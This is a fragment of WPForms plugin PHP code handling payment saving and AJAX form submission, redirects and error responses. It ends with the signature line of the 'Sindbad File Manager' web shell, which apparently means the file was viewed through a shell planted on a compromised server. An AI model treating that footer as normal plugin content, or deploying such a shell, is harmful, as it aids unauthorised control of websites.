* @return int Payment ID.
*/
private function payment_save( $entry ) {
if ( ! wpforms_has_payment( 'entry', $this->fields ) ) {
return 0;
}
$entry['entry_id'] = $this->entry_id;
$form_submission = wpforms()->get( 'submission' )->register( $this->fields, $entry, $this->form_data['id'], $this->form_data );
// Prepare the payment data.
$payment_data = $form_submission->prepare_payment_data();
// Bail early in case payment field exists,
// but no payment data was provided (e.g. old payment addon is used).
if ( empty( $payment_data['gateway'] ) ) {
return 0;
}
// Create payment.
$payment_id = wpforms()->get( 'payment' )->add( $payment_data );
if ( ! $payment_id ) {
return 0;
}
// Insert payment meta.
wpforms()->get( 'payment_meta' )->bulk_add( $payment_id, $form_submission->prepare_payment_meta() );
/**
* Fire after payment was saved to database.
*
* @since 1.8.2
*
* @param int $payment_id Payment id.
* @param array $fields Form fields.
* @param array $form_data Form data.
*/
do_action( 'wpforms_process_payment_saved', $payment_id, $this->fields, $this->form_data );
return $payment_id;
}
/**
* Process AJAX form submit.
*
* @since 1.5.3
*/
public function ajax_submit() {
// phpcs:disable WordPress.Security.NonceVerification.Missing
$form_id = isset( $_POST['wpforms']['id'] ) ? absint( $_POST['wpforms']['id'] ) : 0;
if ( empty( $form_id ) ) {
wp_send_json_error();
}
if ( isset( $_POST['wpforms']['post_id'] ) ) {
// We don't have a global $post when processing ajax requests.
// Therefore, it's needed to set a global $post manually for compatibility with functions used in smart tag processing.
global $post;
// phpcs:ignore WordPress.WP.GlobalVariablesOverride.Prohibited
$post = WP_Post::get_instance( absint( $_POST['wpforms']['post_id'] ) );
}
// phpcs:enable WordPress.Security.NonceVerification.Missing
add_filter( 'wp_redirect', [ $this, 'ajax_process_redirect' ], 999 );
do_action( 'wpforms_ajax_submit_before_processing', $form_id );
// If redirect happens in listen(), ajax_process_redirect() gets executed because of the filter on `wp_redirect`.
// The code, that is below listen(), runs only if no redirect happened.
$this->listen();
$form_data = $this->form_data;
if ( empty( $form_data ) ) {
$form_data = wpforms()->get( 'form' )->get( $form_id, [ 'content_only' => true ] );
$form_data = apply_filters( 'wpforms_frontend_form_data', $form_data );
}
if ( ! empty( $this->errors[ $form_id ] ) ) {
$this->ajax_process_errors( $form_id, $form_data );
wp_send_json_error();
}
ob_start();
wpforms()->get( 'frontend' )->confirmation( $form_data );
$response = apply_filters( 'wpforms_ajax_submit_success_response', [ 'confirmation' => ob_get_clean() ], $form_id, $form_data );
do_action( 'wpforms_ajax_submit_completed', $form_id, $response );
wp_send_json_success( $response );
}
/**
* Process AJAX errors.
*
* @since 1.5.3
* @todo This should be re-used/combined for AMP verify-xhr requests.
*
* @param int $form_id Form ID.
* @param array $form_data Form data and settings.
*/
protected function ajax_process_errors( $form_id, $form_data ) {
$errors = isset( $this->errors[ $form_id ] ) ? $this->errors[ $form_id ] : [];
$errors = apply_filters( 'wpforms_ajax_submit_errors', $errors, $form_id, $form_data );
if ( empty( $errors ) ) {
wp_send_json_error();
}
// General errors are errors that cannot be populated with jQuery Validate plugin.
$general_errors = array_intersect_key( $errors, array_flip( [ 'header', 'footer', 'recaptcha' ] ) );
foreach ( $general_errors as $key => $error ) {
ob_start();
wpforms()->get( 'frontend' )->form_error( $key, $error, $form_data );
$general_errors[ $key ] = ob_get_clean();
}
$fields = isset( $form_data['fields'] ) ? $form_data['fields'] : [];
// Get registered fields errors only.
$field_errors = array_intersect_key( $errors, $fields );
// Transform field ids to field names for jQuery Validate plugin.
foreach ( $field_errors as $key => $error ) {
$name = $this->ajax_error_field_name( $fields[ $key ], $form_data, $error );
if ( $name ) {
$field_errors[ $name ] = $error;
}
unset( $field_errors[ $key ] );
}
$response = [];
if ( $general_errors ) {
$response['errors']['general'] = $general_errors;
}
if ( $field_errors ) {
$response['errors']['field'] = $field_errors;
}
$response = apply_filters( 'wpforms_ajax_submit_errors_response', $response, $form_id, $form_data );
do_action( 'wpforms_ajax_submit_completed', $form_id, $response );
wp_send_json_error( $response );
}
/**
* Get field name for ajax error message.
*
* @since 1.6.3
*
* @param array $field Field settings.
* @param array $form_data Form data and settings.
* @param string $error Error message.
*
* @return string
*/
private function ajax_error_field_name( $field, $form_data, $error ) {
$props = wpforms()->get( 'frontend' )->get_field_properties( $field, $form_data );
return apply_filters( 'wpforms_process_ajax_error_field_name', '', $field, $props, $error );
}
/**
* Process AJAX redirect.
*
* @since 1.5.3
*
* @param string $url Redirect URL.
*/
public function ajax_process_redirect( $url ) {
// phpcs:ignore WordPress.Security.NonceVerification.Missing
$form_id = isset( $_POST['wpforms']['id'] ) ? absint( $_POST['wpforms']['id'] ) : 0;
if ( empty( $form_id ) ) {
wp_send_json_error();
}
$response = [
'form_id' => $form_id,
'redirect_url' => $url,
];
$response = apply_filters( 'wpforms_ajax_submit_redirect', $response, $form_id, $url );
do_action( 'wpforms_ajax_submit_completed', $form_id, $response );
wp_send_json_success( $response );
}
}
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists